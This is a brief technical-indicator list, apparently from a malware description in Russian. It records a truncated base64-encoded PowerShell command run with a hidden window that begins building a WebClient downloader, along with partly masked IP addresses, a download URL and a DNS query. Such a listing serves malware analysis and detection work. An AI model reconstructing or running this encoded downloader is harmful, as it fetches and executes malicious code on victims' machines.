Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABWAF8AXwA0AF8AXwBfAD0AKAAnAGgANwAxADkAJwArACcAXwBfACcAKQA7ACQAagAzADcAMABfADcAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAUQA1ADYANgAwAF8AOQBfAD0AKAAnAGgAdAAnAC...
- '13#.#9.64.173':80
- '13.##6.61.22':80
- '52.##.71.120':80
- '13.##5.133.209':80
- http://13.##6.61.22/Tkjz49D
- DNS ASK pr###dor.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABWAF8AXwA0AF8AXwBfAD0AKAAnAGgANwAxADkAJwArACcAXwBfACcAKQA7ACQAagAzADcAMABfADcAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAUQA1ADYANgAwAF8AOQBfAD0AKAAnAGgAdAAnAC...' (со скрытым окном)